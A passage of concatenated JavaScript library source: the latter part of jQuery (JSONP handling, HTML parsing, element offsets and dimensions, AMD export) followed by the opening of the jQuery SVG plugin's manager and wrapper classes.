					async: true,
					charset: s.scriptCharset,
					src: s.url
				}).on(
					"load error",
					callback = function( evt ) {
						script.remove();
						callback = null;
						if ( evt ) {
							complete( evt.type === "error" ? 404 : 200, evt.type );
						}
					}
				);
				document.head.appendChild( script[ 0 ] );
			},
			abort: function() {
				if ( callback ) {
					callback();
				}
			}
		};
	}
});




var oldCallbacks = [],
	rjsonp = /(=)\?(?=&|$)|\?\?/;

// Default jsonp settings
jQuery.ajaxSetup({
	jsonp: "callback",
	jsonpCallback: function() {
		var callback = oldCallbacks.pop() || ( jQuery.expando + "_" + ( nonce++ ) );
		this[ callback ] = true;
		return callback;
	}
});

// Detect, normalize options and install callbacks for jsonp requests
jQuery.ajaxPrefilter( "json jsonp", function( s, originalSettings, jqXHR ) {

	var callbackName, overwritten, responseContainer,
		jsonProp = s.jsonp !== false && ( rjsonp.test( s.url ) ?
			"url" :
			typeof s.data === "string" && !( s.contentType || "" ).indexOf("application/x-www-form-urlencoded") && rjsonp.test( s.data ) && "data"
		);

	// Handle iff the expected data type is "jsonp" or we have a parameter to set
	if ( jsonProp || s.dataTypes[ 0 ] === "jsonp" ) {

		// Get callback name, remembering preexisting value associated with it
		callbackName = s.jsonpCallback = jQuery.isFunction( s.jsonpCallback ) ?
			s.jsonpCallback() :
			s.jsonpCallback;

		// Insert callback into url or form data
		if ( jsonProp ) {
			s[ jsonProp ] = s[ jsonProp ].replace( rjsonp, "$1" + callbackName );
		} else if ( s.jsonp !== false ) {
			s.url += ( rquery.test( s.url ) ? "&" : "?" ) + s.jsonp + "=" + callbackName;
		}

		// Use data converter to retrieve json after script execution
		s.converters["script json"] = function() {
			if ( !responseContainer ) {
				jQuery.error( callbackName + " was not called" );
			}
			return responseContainer[ 0 ];
		};

		// force json dataType
		s.dataTypes[ 0 ] = "json";

		// Install callback
		overwritten = window[ callbackName ];
		window[ callbackName ] = function() {
			responseContainer = arguments;
		};

		// Clean-up function (fires after converters)
		jqXHR.always(function() {
			// Restore preexisting value
			window[ callbackName ] = overwritten;

			// Save back as free
			if ( s[ callbackName ] ) {
				// make sure that re-using the options doesn't screw things around
				s.jsonpCallback = originalSettings.jsonpCallback;

				// save the callback name for future use
				oldCallbacks.push( callbackName );
			}

			// Call if it was a function and we have a response
			if ( responseContainer && jQuery.isFunction( overwritten ) ) {
				overwritten( responseContainer[ 0 ] );
			}

			responseContainer = overwritten = undefined;
		});

		// Delegate to script
		return "script";
	}
});




// data: string of html
// context (optional): If specified, the fragment will be created in this context, defaults to document
// keepScripts (optional): If true, will include scripts passed in the html string
jQuery.parseHTML = function( data, context, keepScripts ) {
	if ( !data || typeof data !== "string" ) {
		return null;
	}
	if ( typeof context === "boolean" ) {
		keepScripts = context;
		context = false;
	}
	context = context || document;

	var parsed = rsingleTag.exec( data ),
		scripts = !keepScripts && [];

	// Single tag
	if ( parsed ) {
		return [ context.createElement( parsed[1] ) ];
	}

	parsed = jQuery.buildFragment( [ data ], context, scripts );

	if ( scripts && scripts.length ) {
		jQuery( scripts ).remove();
	}

	return jQuery.merge( [], parsed.childNodes );
};


// Keep a copy of the old load method
var _load = jQuery.fn.load;

/**
 * Load a url into a page
 */
jQuery.fn.load = function( url, params, callback ) {
	if ( typeof url !== "string" && _load ) {
		return _load.apply( this, arguments );
	}

	var selector, type, response,
		self = this,
		off = url.indexOf(" ");

	if ( off >= 0 ) {
		selector = jQuery.trim( url.slice( off ) );
		url = url.slice( 0, off );
	}

	// If it's a function
	if ( jQuery.isFunction( params ) ) {

		// We assume that it's the callback
		callback = params;
		params = undefined;

	// Otherwise, build a param string
	} else if ( params && typeof params === "object" ) {
		type = "POST";
	}

	// If we have elements to modify, make the request
	if ( self.length > 0 ) {
		jQuery.ajax({
			url: url,

			// if "type" variable is undefined, then "GET" method will be used
			type: type,
			dataType: "html",
			data: params
		}).done(function( responseText ) {

			// Save response for use in complete callback
			response = arguments;

			self.html( selector ?

				// If a selector was specified, locate the right elements in a dummy div
				// Exclude scripts to avoid IE 'Permission Denied' errors
				jQuery("<div>").append( jQuery.parseHTML( responseText ) ).find( selector ) :

				// Otherwise use the full result
				responseText );

		}).complete( callback && function( jqXHR, status ) {
			self.each( callback, response || [ jqXHR.responseText, status, jqXHR ] );
		});
	}

	return this;
};




// Attach a bunch of functions for handling common AJAX events
jQuery.each( [ "ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend" ], function( i, type ) {
	jQuery.fn[ type ] = function( fn ) {
		return this.on( type, fn );
	};
});




jQuery.expr.filters.animated = function( elem ) {
	return jQuery.grep(jQuery.timers, function( fn ) {
		return elem === fn.elem;
	}).length;
};




var docElem = window.document.documentElement;

/**
 * Gets a window from an element
 */
function getWindow( elem ) {
	return jQuery.isWindow( elem ) ? elem : elem.nodeType === 9 && elem.defaultView;
}

jQuery.offset = {
	setOffset: function( elem, options, i ) {
		var curPosition, curLeft, curCSSTop, curTop, curOffset, curCSSLeft, calculatePosition,
			position = jQuery.css( elem, "position" ),
			curElem = jQuery( elem ),
			props = {};

		// Set position first, in-case top/left are set even on static elem
		if ( position === "static" ) {
			elem.style.position = "relative";
		}

		curOffset = curElem.offset();
		curCSSTop = jQuery.css( elem, "top" );
		curCSSLeft = jQuery.css( elem, "left" );
		calculatePosition = ( position === "absolute" || position === "fixed" ) &&
			( curCSSTop + curCSSLeft ).indexOf("auto") > -1;

		// Need to be able to calculate position if either
		// top or left is auto and position is either absolute or fixed
		if ( calculatePosition ) {
			curPosition = curElem.position();
			curTop = curPosition.top;
			curLeft = curPosition.left;

		} else {
			curTop = parseFloat( curCSSTop ) || 0;
			curLeft = parseFloat( curCSSLeft ) || 0;
		}

		if ( jQuery.isFunction( options ) ) {
			options = options.call( elem, i, curOffset );
		}

		if ( options.top != null ) {
			props.top = ( options.top - curOffset.top ) + curTop;
		}
		if ( options.left != null ) {
			props.left = ( options.left - curOffset.left ) + curLeft;
		}

		if ( "using" in options ) {
			options.using.call( elem, props );

		} else {
			curElem.css( props );
		}
	}
};

jQuery.fn.extend({
	offset: function( options ) {
		if ( arguments.length ) {
			return options === undefined ?
				this :
				this.each(function( i ) {
					jQuery.offset.setOffset( this, options, i );
				});
		}

		var docElem, win,
			elem = this[ 0 ],
			box = { top: 0, left: 0 },
			doc = elem && elem.ownerDocument;

		if ( !doc ) {
			return;
		}

		docElem = doc.documentElement;

		// Make sure it's not a disconnected DOM node
		if ( !jQuery.contains( docElem, elem ) ) {
			return box;
		}

		// Support: BlackBerry 5, iOS 3 (original iPhone)
		// If we don't have gBCR, just use 0,0 rather than error
		if ( typeof elem.getBoundingClientRect !== strundefined ) {
			box = elem.getBoundingClientRect();
		}
		win = getWindow( doc );
		return {
			top: box.top + win.pageYOffset - docElem.clientTop,
			left: box.left + win.pageXOffset - docElem.clientLeft
		};
	},

	position: function() {
		if ( !this[ 0 ] ) {
			return;
		}

		var offsetParent, offset,
			elem = this[ 0 ],
			parentOffset = { top: 0, left: 0 };

		// Fixed elements are offset from window (parentOffset = {top:0, left: 0}, because it is its only offset parent
		if ( jQuery.css( elem, "position" ) === "fixed" ) {
			// Assume getBoundingClientRect is there when computed position is fixed
			offset = elem.getBoundingClientRect();

		} else {
			// Get *real* offsetParent
			offsetParent = this.offsetParent();

			// Get correct offsets
			offset = this.offset();
			if ( !jQuery.nodeName( offsetParent[ 0 ], "html" ) ) {
				parentOffset = offsetParent.offset();
			}

			// Add offsetParent borders
			parentOffset.top += jQuery.css( offsetParent[ 0 ], "borderTopWidth", true );
			parentOffset.left += jQuery.css( offsetParent[ 0 ], "borderLeftWidth", true );
		}

		// Subtract parent offsets and element margins
		return {
			top: offset.top - parentOffset.top - jQuery.css( elem, "marginTop", true ),
			left: offset.left - parentOffset.left - jQuery.css( elem, "marginLeft", true )
		};
	},

	offsetParent: function() {
		return this.map(function() {
			var offsetParent = this.offsetParent || docElem;

			while ( offsetParent && ( !jQuery.nodeName( offsetParent, "html" ) && jQuery.css( offsetParent, "position" ) === "static" ) ) {
				offsetParent = offsetParent.offsetParent;
			}

			return offsetParent || docElem;
		});
	}
});

// Create scrollLeft and scrollTop methods
jQuery.each( { scrollLeft: "pageXOffset", scrollTop: "pageYOffset" }, function( method, prop ) {
	var top = "pageYOffset" === prop;

	jQuery.fn[ method ] = function( val ) {
		return access( this, function( elem, method, val ) {
			var win = getWindow( elem );

			if ( val === undefined ) {
				return win ? win[ prop ] : elem[ method ];
			}

			if ( win ) {
				win.scrollTo(
					!top ? val : window.pageXOffset,
					top ? val : window.pageYOffset
				);

			} else {
				elem[ method ] = val;
			}
		}, method, val, arguments.length, null );
	};
});

// Support: Safari<7+, Chrome<37+
// Add the top/left cssHooks using jQuery.fn.position
// Webkit bug: https://bugs.webkit.org/show_bug.cgi?id=29084
// Blink bug: https://code.google.com/p/chromium/issues/detail?id=229280
// getComputedStyle returns percent when specified for top/left/bottom/right;
// rather than make the css module depend on the offset module, just check for it here
jQuery.each( [ "top", "left" ], function( i, prop ) {
	jQuery.cssHooks[ prop ] = addGetHookIf( support.pixelPosition,
		function( elem, computed ) {
			if ( computed ) {
				computed = curCSS( elem, prop );
				// If curCSS returns percentage, fallback to offset
				return rnumnonpx.test( computed ) ?
					jQuery( elem ).position()[ prop ] + "px" :
					computed;
			}
		}
	);
});


// Create innerHeight, innerWidth, height, width, outerHeight and outerWidth methods
jQuery.each( { Height: "height", Width: "width" }, function( name, type ) {
	jQuery.each( { padding: "inner" + name, content: type, "": "outer" + name }, function( defaultExtra, funcName ) {
		// Margin is only for outerHeight, outerWidth
		jQuery.fn[ funcName ] = function( margin, value ) {
			var chainable = arguments.length && ( defaultExtra || typeof margin !== "boolean" ),
				extra = defaultExtra || ( margin === true || value === true ? "margin" : "border" );

			return access( this, function( elem, type, value ) {
				var doc;

				if ( jQuery.isWindow( elem ) ) {
					// As of 5/8/2012 this will yield incorrect results for Mobile Safari, but there
					// isn't a whole lot we can do. See pull request at this URL for discussion:
					// https://github.com/jquery/jquery/pull/764
					return elem.document.documentElement[ "client" + name ];
				}

				// Get document width or height
				if ( elem.nodeType === 9 ) {
					doc = elem.documentElement;

					// Either scroll[Width/Height] or offset[Width/Height] or client[Width/Height],
					// whichever is greatest
					return Math.max(
						elem.body[ "scroll" + name ], doc[ "scroll" + name ],
						elem.body[ "offset" + name ], doc[ "offset" + name ],
						doc[ "client" + name ]
					);
				}

				return value === undefined ?
					// Get width or height on the element, requesting but not forcing parseFloat
					jQuery.css( elem, type, extra ) :

					// Set width or height on the element
					jQuery.style( elem, type, value, extra );
			}, type, chainable ? margin : undefined, chainable, null );
		};
	});
});


// The number of elements contained in the matched element set
jQuery.fn.size = function() {
	return this.length;
};

jQuery.fn.andSelf = jQuery.fn.addBack;




// Register as a named AMD module, since jQuery can be concatenated with other
// files that may use define, but not via a proper concatenation script that
// understands anonymous AMD modules. A named AMD is safest and most robust
// way to register. Lowercase jquery is used because AMD module names are
// derived from file names, and jQuery is normally delivered in a lowercase
// file name. Do this after creating the global so that if an AMD module wants
// to call noConflict to hide this version of jQuery, it will work.

// Note that for maximum portability, libraries that are not jQuery should
// declare themselves as anonymous modules, and avoid setting a global if an
// AMD loader is present. jQuery is a special case. For more information, see
// https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon

if ( typeof define === "function" && define.amd ) {
	define( "jquery", [], function() {
		return jQuery;
	});
}




var
	// Map over jQuery in case of overwrite
	_jQuery = window.jQuery,

	// Map over the $ in case of overwrite
	_$ = window.$;

jQuery.noConflict = function( deep ) {
	if ( window.$ === jQuery ) {
		window.$ = _$;
	}

	if ( deep && window.jQuery === jQuery ) {
		window.jQuery = _jQuery;
	}

	return jQuery;
};

// Expose jQuery and $ identifiers, even in AMD
// (#7102#comment:10, https://github.com/jquery/jquery/pull/557)
// and CommonJS for browser emulators (#13566)
if ( typeof noGlobal === strundefined ) {
	window.jQuery = window.$ = jQuery;
}




return jQuery;

}));


==> results/VENN-Diag/jquery.svg.js <==
/* http://keith-wood.name/svg.html
   SVG for jQuery v1.5.0.
   Written by Keith Wood (kbwood{at}iinet.com.au) August 2007.
   Available under the MIT (http://keith-wood.name/licence.html) license. 
   Please attribute the author if you use it. */

(function($) { // Hide scope, no $ conflict

/** The SVG manager.
	<p>Use the singleton instance of this class, $.svg, 
	to interact with the SVG functionality.</p>
	<p>Expects HTML like:</p>
	<pre>&lt;div>&lt;/div></pre>
	@module SVGManager */
function SVGManager() {
	this._settings = []; // Settings to be remembered per SVG object
	this._extensions = []; // List of SVG extensions added to SVGWrapper
		// for each entry [0] is extension name, [1] is extension class (function)
		// the function takes one parameter - the SVGWrapper instance
	this.regional = []; // Localisations, indexed by language, '' for default (English)
	this.regional[''] = {errorLoadingText: 'Error loading'};
	this.local = this.regional['']; // Current localisation
	this._uuid = new Date().getTime();
	this._ie = !!window.ActiveXObject;
}

$.extend(SVGManager.prototype, {
	/** Class name added to elements to indicate already configured with SVG. */
	markerClassName: 'hasSVG',
	/** Name of the data property for instance settings. */
	propertyName: 'svgwrapper',

	/** SVG namespace. */
	svgNS: 'http://www.w3.org/2000/svg',
	/** XLink namespace. */
	xlinkNS: 'http://www.w3.org/1999/xlink',

	/** SVG wrapper class. */
	_wrapperClass: SVGWrapper,

	/* Camel-case versions of attribute names containing dashes or are reserved words. */
	_attrNames: {class_: 'class', in_: 'in',
		alignmentBaseline: 'alignment-baseline', baselineShift: 'baseline-shift',
		clipPath: 'clip-path', clipRule: 'clip-rule',
		colorInterpolation: 'color-interpolation',
		colorInterpolationFilters: 'color-interpolation-filters',
		colorRendering: 'color-rendering', dominantBaseline: 'dominant-baseline',
		enableBackground: 'enable-background', fillOpacity: 'fill-opacity',
		fillRule: 'fill-rule', floodColor: 'flood-color',
		floodOpacity: 'flood-opacity', fontFamily: 'font-family',
		fontSize: 'font-size', fontSizeAdjust: 'font-size-adjust',
		fontStretch: 'font-stretch', fontStyle: 'font-style',
		fontVariant: 'font-variant', fontWeight: 'font-weight',
		glyphOrientationHorizontal: 'glyph-orientation-horizontal',
		glyphOrientationVertical: 'glyph-orientation-vertical',
		horizAdvX: 'horiz-adv-x', horizOriginX: 'horiz-origin-x',
		imageRendering: 'image-rendering', letterSpacing: 'letter-spacing',
		lightingColor: 'lighting-color', markerEnd: 'marker-end',
		markerMid: 'marker-mid', markerStart: 'marker-start',
		stopColor: 'stop-color', stopOpacity: 'stop-opacity',
		strikethroughPosition: 'strikethrough-position',
		strikethroughThickness: 'strikethrough-thickness',
		strokeDashArray: 'stroke-dasharray', strokeDashOffset: 'stroke-dashoffset',
		strokeLineCap: 'stroke-linecap', strokeLineJoin: 'stroke-linejoin',
		strokeMiterLimit: 'stroke-miterlimit', strokeOpacity: 'stroke-opacity',
		strokeWidth: 'stroke-width', textAnchor: 'text-anchor',
		textDecoration: 'text-decoration', textRendering: 'text-rendering',
		underlinePosition: 'underline-position', underlineThickness: 'underline-thickness',
		vertAdvY: 'vert-adv-y', vertOriginY: 'vert-origin-y',
		wordSpacing: 'word-spacing', writingMode: 'writing-mode'},

	/* Add the SVG object to its container. */
	_attachSVG: function(container, settings) {
		var svg = (container.namespaceURI === this.svgNS ? container : null);
		var container = (svg ? null : container);
		if ($(container || svg).hasClass(this.markerClassName)) {
			return;
		}
		if (typeof settings === 'string') {
			settings = {loadURL: settings};
		}
		else if (typeof settings === 'function') {
			settings = {onLoad: settings};
		}
		$(container || svg).addClass(this.markerClassName);
		try {
			if (!svg) {
				svg = document.createElementNS(this.svgNS, 'svg');
				svg.setAttribute('version', '1.1');
				if (container.clientWidth > 0) {
					svg.setAttribute('width', container.clientWidth);
				}
				if (container.clientHeight > 0) {
					svg.setAttribute('height', container.clientHeight);
				}
				container.appendChild(svg);
			}
			this._afterLoad(container, svg, settings || {});
		}
		catch (e) {
			$(container).html('<p>SVG is not supported natively on this browser</p>');
		}
	},

	/* Post-processing once loaded. */
	_afterLoad: function(container, svg, settings) {
		var settings = settings || this._settings[container.id];
		this._settings[container ? container.id : ''] = null;
		var wrapper = new this._wrapperClass(svg, container);
		$.data(container || svg, $.svg.propertyName, wrapper);
		try {
			if (settings.loadURL) { // Load URL
				wrapper.load(settings.loadURL, settings);
			}
			if (settings.settings) { // Additional settings
				wrapper.configure(settings.settings);
			}
			if (settings.onLoad && !settings.loadURL) { // Onload callback
				settings.onLoad.apply(container || svg, [wrapper]);
			}
		}
		catch (e) {
			alert(e);
		}
	},

	/** Return the SVG wrapper created for a given container.
		@param container {string|Element|jQuery} Selector for the container or
				the container for the SVG object or jQuery collection where first entry is the container.
		@return {SVGWrapper} The corresponding SVG wrapper element, or <code>null</code> if not attached. */
	_getSVG: function(container) {
		return $(container).data(this.propertyName);
	},

	/** Remove the SVG functionality from a div.
		@param container {Element} The container for the SVG object. */
	_destroySVG: function(container) {
		container = $(container);
		if (!container.hasClass(this.markerClassName)) {
			return;
		}
		container.removeClass(this.markerClassName).removeData(this.propertyName);
		if (container[0].namespaceURI !== this.svgNS) {
			container.empty();
		}
	},

	/** Extend the SVGWrapper object with an embedded class.
		<p>The constructor function must take a single parameter that is
	   a reference to the owning SVG root object. This allows the 
		extension to access the basic SVG functionality.</p>
		@param name {string} The name of the <code>SVGWrapper</code> attribute to access the new class.
		@param extClass {function} The extension class constructor. */
	addExtension: function(name, extClass) {
		this._extensions.push([name, extClass]);
	},

	/** Does this node belong to SVG?
		@param node {Element} The node to be tested.
		@return {boolean} <code>true</code> if an SVG node, <code>false</code> if not. */
	isSVGElem: function(node) {
		return (node.nodeType === 1 && node.namespaceURI === $.svg.svgNS);
	}
});

/** The main SVG interface, which encapsulates the SVG element.
	<p>Obtain a reference from $().svg('get')</p>
	@module SVGWrapper */
function SVGWrapper(svg, container) {
	this._svg = svg; // The SVG root node
	this._container = container; // The containing div
	for (var i = 0; i < $.svg._extensions.length; i++) {
		var extension = $.svg._extensions[i];
		this[extension[0]] = new extension[1](this);
	}
}

$.extend(SVGWrapper.prototype, {

	/** Retrieve the width of the SVG object.
		@return {number} The width of the SVG canvas. */
	width: function() {
		return (this._container ? this._container.clientWidth : this._svg.width);
	},

	/** Retrieve the height of the SVG object.
		@return {number} The height of the SVG canvas. */
	height: function() {
		return (this._container ? this._container.clientHeight : this._svg.height);
	},

	/** Retrieve the root SVG element.
		@return {SVGElement} The top-level SVG element. */
	root: function() {
		return this._svg;
	},

	/** Configure a SVG node.
		@param [node] {SVGElement} The node to configure, or the SVG root if not specified.
		@param settings {object} Additional settings for the root.
		@param [clear=false] {boolean} <code>true</code> to remove existing attributes first,
				<code>false</code> to add to what is already there.
		@return {SVGWrapper} This wrapper. */
	configure: function(node, settings, clear) {
		if (!node.nodeName) {
			clear = settings;
			settings = node;
			node = this._svg;
		}
		if (clear) {
			for (var i = node.attributes.length - 1; i >= 0; i--) {
				var attr = node.attributes.item(i);
				if (!(attr.nodeName === 'onload' || attr.nodeName === 'version' || 
						attr.nodeName.substring(0, 5) === 'xmlns')) {
					node.attributes.removeNamedItem(attr.nodeName);
				}
			}
		}
		for (var attrName in settings) {
			node.setAttribute($.svg._attrNames[attrName] || attrName, settings[attrName]);
		}
		return this;
	},

	/** Locate a specific element in the SVG document.
		@param id {string} The element's identifier.
		@return {SVGElement} The element reference, or <code>null</code> if not found. */
	getElementById: function(id) {
		return this._svg.ownerDocument.getElementById(id);
	},

	/** Change the attributes for a SVG node.
		@param element {SVGElement} The node to change.
		@param settings {object} The new settings.
		@return {SVGWrapper} This wrapper. */
	change: function(element, settings) {
		if (element) {
			for (var name in settings) {
				if (settings[name] == null) {
					element.removeAttribute($.svg._attrNames[name] || name);
				}
				else {
					element.setAttribute($.svg._attrNames[name] || name, settings[name]);
				}
			}
		}
		return this;
	},

	/** Check for parent being absent and adjust arguments accordingly.
		@private
		@param values {string[]} The given parameters.
		@param names {string[]} The names of the parameters in order.
		@param optSettings {string[]} The names of optional parameters.
		@return {object} An object representing the named parameters. */
	_args: function(values, names, optSettings) {
		names.splice(0, 0, 'parent');
		names.splice(names.length, 0, 'settings');
		var args = {};
		var offset = 0;
		if (values[0] != null && values[0].jquery) {
			values[0] = values[0][0];
		}
		if (values[0] != null && !(typeof values[0] === 'object' && values[0].nodeName)) {
			args['parent'] = null;
			offset = 1;
		}
		for (var i = 0; i < values.length; i++) {
			args[names[i + offset]] = values[i];
		}
		if (optSettings) {
			$.each(optSettings, function(i, value) {
				if (typeof args[value] === 'object') {
					args.settings = args[value];
					args[value] = null;
				}
			});
		}
		return args;
	},

	/** Add a title.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param text {string} The text of the title.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new title node. */
	title: function(parent, text, settings) {
		var args = this._args(arguments, ['text']);
		var node = this._makeNode(args.parent, 'title', args.settings || {});
		node.appendChild(this._svg.ownerDocument.createTextNode(args.text));
		return node;
	},

	/** Add a description.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param text {string} The text of the description.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new description node. */
	describe: function(parent, text, settings) {
		var args = this._args(arguments, ['text']);
		var node = this._makeNode(args.parent, 'desc', args.settings || {});
		node.appendChild(this._svg.ownerDocument.createTextNode(args.text));
		return node;
	},

	/** Add a definitions node.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param [id] {string} The ID of this definitions (optional).
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new definitions node. */
	defs: function(parent, id, settings) {
		var args = this._args(arguments, ['id'], ['id']);
		return this._makeNode(args.parent, 'defs', $.extend((args.id ? {id: args.id} : {}), args.settings || {}));
	},

	/** Add a symbol definition.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID of this symbol.
		@param x1 {number} The left coordinate for this symbol.
		@param y1 {number} The top coordinate for this symbol.
		@param width {number} The width of this symbol.
		@param height {number} The height of this symbol.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new symbol node. */
	symbol: function(parent, id, x1, y1, width, height, settings) {
		var args = this._args(arguments, ['id', 'x1', 'y1', 'width', 'height']);
		return this._makeNode(args.parent, 'symbol', $.extend({id: args.id,
				viewBox: args.x1 + ' ' + args.y1 + ' ' + args.width + ' ' + args.height}, args.settings || {}));
	},

	/** Add a marker definition.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID of this marker.
		@param refX {number} The x-coordinate for the reference point.
		@param refY {number} The y-coordinate for the reference point.
		@param mWidth {number} The marker viewport width.
		@param mHeight {number} The marker viewport height.
		@param [orient] {string|number} 'auto' or angle (degrees).
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new marker node. */
	marker: function(parent, id, refX, refY, mWidth, mHeight, orient, settings) {
		var args = this._args(arguments, ['id', 'refX', 'refY', 'mWidth', 'mHeight', 'orient'], ['orient']);
		return this._makeNode(args.parent, 'marker', $.extend(
			{id: args.id, refX: args.refX, refY: args.refY, markerWidth: args.mWidth, 
			markerHeight: args.mHeight, orient: args.orient || 'auto'}, args.settings || {}));
	},

	/** Add a style node.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param styles {string} The CSS styles.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new style node. */
	style: function(parent, styles, settings) {
		var args = this._args(arguments, ['styles']);
		var node = this._makeNode(args.parent, 'style', $.extend({type: 'text/css'}, args.settings || {}));
		node.appendChild(this._svg.ownerDocument.createTextNode(args.styles));
		return node;
	},

	/** Add a script node.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param script {string} The JavaScript code.
		@param [type='text/javascript'] {string} The MIME type for the code.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new script node. */
	script: function(parent, script, type, settings) {
		var args = this._args(arguments, ['script', 'type'], ['type']);
		var node = this._makeNode(args.parent, 'script', $.extend(
			{type: args.type || 'text/javascript'}, args.settings || {}));
		node.appendChild(this._svg.ownerDocument.createTextNode(args.script));
		if ($.svg._ie) {
			$.globalEval(args.script);
		}
		return node;
	},

	/** Add a linear gradient definition.
		<p>Specify all of <code>x1</code>, <code>y1</code>, <code>x2</code>, <code>y2</code> or none of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID for this gradient.
		@param stops {string[][]} The gradient stops, each entry is [0] is offset (0.0-1.0 or 0%-100%),
				[1] is colour, [2] is opacity (optional).
		@param [x1] {number} The x-coordinate of the gradient start.
		@param [y1] {number} The y-coordinate of the gradient start.
		@param [x2] {number} The x-coordinate of the gradient end.
		@param [y2] {number} The y-coordinate of the gradient end.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new linear gradient node. */
	linearGradient: function(parent, id, stops, x1, y1, x2, y2, settings) {
		var args = this._args(arguments, ['id', 'stops', 'x1', 'y1', 'x2', 'y2'], ['x1']);
		var sets = $.extend({id: args.id},
				(args.x1 != null ? {x1: args.x1, y1: args.y1, x2: args.x2, y2: args.y2} : {}));
		return this._gradient(args.parent, 'linearGradient', $.extend(sets, args.settings || {}), args.stops);
	},

	/** Add a radial gradient definition.
		<p>Specify all of <code>cx</code>, <code>cy</code>, <code>r</code>,
		<code>fx</code>, <code>fy</code> or none of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID for this gradient.
		@param stops {string[][]} The gradient stops, each entry [0] is offset (0.0-1.0 or 0%-100%),
				[1] is colour, [2] is opacity (optional).
		@param [cx] {number} The x-coordinate of the largest circle centre.
		@param [cy] {number} The y-coordinate of the largest circle centre.
		@param [r] {number} The radius of the largest circle.
		@param [fx] {number} The x-coordinate of the gradient focus.
		@param [fy] {number} The y-coordinate of the gradient focus.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new radial gradient node. */
	radialGradient: function(parent, id, stops, cx, cy, r, fx, fy, settings) {
		var args = this._args(arguments, ['id', 'stops', 'cx', 'cy', 'r', 'fx', 'fy'], ['cx']);
		var sets = $.extend({id: args.id},
			(args.cx != null ? {cx: args.cx, cy: args.cy, r: args.r, fx: args.fx, fy: args.fy} : {}));
		return this._gradient(args.parent, 'radialGradient', $.extend(sets, args.settings || {}), args.stops);
	},

	/** Add a gradient node.
		@private
		@param parent {SVGElement|jQuery} The parent node for the new node.
		@param name {string} The type of gradient node to create.
		@param settings {object} The settings for this node.
		@param stops {string[][]} The gradient stops.
		@return {SVGElement} The new gradient node. */
	_gradient: function(parent, name, settings, stops) {
		var node = this._makeNode(parent, name, settings);
		for (var i = 0; i < stops.length; i++) {
			var stop = stops[i];
			this._makeNode(node, 'stop', $.extend({offset: stop[0], stopColor: stop[1]}, 
				(stop[2] != null ? {stopOpacity: stop[2]} : {})));
		}
		return node;
	},

	/** Add a pattern definition.
		<p>Specify all of <code>vx</code>, <code>vy</code>, <code>xwidth</code>,
		<code>vheight</code> or none of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID for this pattern.
		@param x {number} The x-coordinate for the left edge of the pattern.
		@param y {number} The y-coordinate for the top edge of the pattern.
		@param width {number} The width of the pattern.
		@param height {number} The height of the pattern.
		@param [vx] {number} The minimum x-coordinate for view box.
		@param [vy] {number} The minimum y-coordinate for the view box.
		@param [vwidth] {number} The width of the view box.
		@param [vheight] {number} The height of the view box.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new pattern definition node. */
	pattern: function(parent, id, x, y, width, height, vx, vy, vwidth, vheight, settings) {
		var args = this._args(arguments, ['id', 'x', 'y', 'width', 'height', 'vx', 'vy', 'vwidth', 'vheight'], ['vx']);
		var sets = $.extend({id: args.id, x: args.x, y: args.y, width: args.width, height: args.height},
			(args.vx != null ? {viewBox: args.vx + ' ' + args.vy + ' ' + args.vwidth + ' ' + args.vheight} : {}));
		return this._makeNode(args.parent, 'pattern', $.extend(sets, args.settings || {}));
	},

	/** Add a clip path definition.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID for this path.
		@param [units='userSpaceOnUse'] {string} Either 'userSpaceOnUse' or 'objectBoundingBox'.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new clip path definition node. */
	clipPath: function(parent, id, units, settings) {
		var args = this._args(arguments, ['id', 'units']);
		args.units = args.units || 'userSpaceOnUse';
		return this._makeNode(args.parent, 'clipPath', $.extend(
			{id: args.id, clipPathUnits: args.units}, args.settings || {}));
	},

	/** Add a mask definition.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param id {string} The ID for this mask.
		@param x {number} The x-coordinate for the left edge of the mask.
		@param y {number} The y-coordinate for the top edge of the mask.
		@param width {number} The width of the mask.
		@param height {number} The height of the mask.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new mask definition node. */
	mask: function(parent, id, x, y, width, height, settings) {
		var args = this._args(arguments, ['id', 'x', 'y', 'width', 'height']);
		return this._makeNode(args.parent, 'mask', $.extend(
			{id: args.id, x: args.x, y: args.y, width: args.width, height: args.height}, args.settings || {}));
	},

	/** Create a new path object.
		@return {SVGPath} A new path object. */
	createPath: function() {
		return new SVGPath();
	},

	/** Create a new text object.
		@return {SVGText} A new text object. */
	createText: function() {
		return new SVGText();
	},

	/** Add an embedded SVG element.
		<p>Specify all of <code>vx</code>, <code>vy</code>,
		<code>vwidth</code>, <code>vheight</code> or none of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param x {number} The x-coordinate for the left edge of the node.
